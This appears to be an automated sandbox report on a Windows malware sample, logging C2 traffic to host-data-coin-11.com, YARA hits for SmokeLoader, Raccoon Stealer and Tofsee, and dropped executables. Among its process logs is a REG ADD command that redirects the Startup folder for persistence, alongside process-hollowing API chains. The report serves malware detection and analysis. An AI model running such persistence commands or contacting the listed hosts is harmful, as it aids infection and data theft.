20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 01 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 09:45:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:45:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 09:45:00 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytes
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jsplktel.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: host-data-coin-11.com
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.6:49703 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49720 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.6:49749 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49751 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49762 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49772 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          Yara detected SmokeLoader
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.gdrgbdj.6515a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.1.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.2.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.zmbGUZTICp.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.408517834.00000000005C1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.408471084.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.462828818.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.392111314.0000000004151000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.462437704.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Source: gdrgbdj, 00000005.00000002.444106308.000000000072A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

                          Yara detected Raccoon Stealer
                          Source: Yara matchFile source: 31.2.A7F0.exe.4d60e50.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.3.A7F0.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.4d60e50.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.3.A7F0.exe.4e00000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001F.00000002.640601105.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000002.662718681.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000003.553585077.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: A7F0.exe PID: 2200, type: MEMORYSTR

                          Spam, unwanted Advertisements and Ransom Demands:

                          Yara detected Tofsee
                          Source: Yara matchFile source: 11.3.309C.exe.660000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.3.tejjnepq.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 27.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.ed0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 27.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.ed0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000018.00000003.484958252.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.487069234.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.639945191.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.465535302.0000000000660000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.488137960.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.483029167.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.487496290.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.482701616.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 309C.exe PID: 5132, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: tejjnepq.exe PID: 2320, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4692, type: MEMORYSTR

                          System Summary:

                          PE file has nameless sections
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_0042B040
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_0042A260
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00424C60
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_006431FF
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00643253
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402B2E
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402AB3
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402A5F
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0208160C
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_020815DE
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_020815F6
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_004250A0
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_0042B480
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_0042A6A0
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_00B596F0
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_00B50470
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_00B50462
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025B53F8
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025B1810
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025B2E48
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025B0448
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C4758
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C67B8
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C1528
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C08B0
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C2C88
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025CAD68
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025C90D3
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                          Source: zmbGUZTICp.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: zmbGUZTICp.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: zmbGUZTICp.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: zmbGUZTICp.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A7F0.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A7F0.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: A7F0.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1E7F.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1E7F.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1E7F.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 2DB3.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 2DB3.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 2DB3.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 2DB3.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 309C.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 309C.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 309C.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 309C.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BC16.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BC16.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BC16.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BC16.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1D34.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1D34.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1D34.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 2D04.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gdrgbdj.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gdrgbdj.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gdrgbdj.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gdrgbdj.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tejjnepq.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tejjnepq.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tejjnepq.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tejjnepq.exe.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeSection loaded: mscorjit.dll
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: zmbGUZTICp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: String function: 004048D0 appears 460 times
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: String function: 00632794 appears 35 times
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: String function: 0040EE2A appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: String function: 0041E570 appears 32 times
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: String function: 00402544 appears 53 times
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: String function: 004229D0 appears 133 times
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: String function: 0041E150 appears 172 times
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00640110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_2_00402491 NtOpenKey,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                          Source: A7F0.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 1E7F.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 1D34.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: D452.exe.2.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 239.exe.2.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: D452.exe.2.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: D452.exe.2.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: D452.exe.2.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: D452.exe.2.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: 239.exe.2.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: 239.exe.2.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: 239.exe.2.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: 239.exe.2.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: 2D04.exe.2.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                          Source: zmbGUZTICp.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@61/51@81/19
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeFile read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: zmbGUZTICp.exeVirustotal: Detection: 35%
                          Source: zmbGUZTICp.exeReversingLabs: Detection: 41%
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\zmbGUZTICp.exe "C:\Users\user\Desktop\zmbGUZTICp.exe"
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeProcess created: C:\Users\user\Desktop\zmbGUZTICp.exe "C:\Users\user\Desktop\zmbGUZTICp.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\gdrgbdj C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjProcess created: C:\Users\user\AppData\Roaming\gdrgbdj C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1E7F.exe C:\Users\user\AppData\Local\Temp\1E7F.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2DB3.exe C:\Users\user\AppData\Local\Temp\2DB3.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\309C.exe C:\Users\user\AppData\Local\Temp\309C.exe
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 520
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3F71.exe C:\Users\user\AppData\Local\Temp\3F71.exe
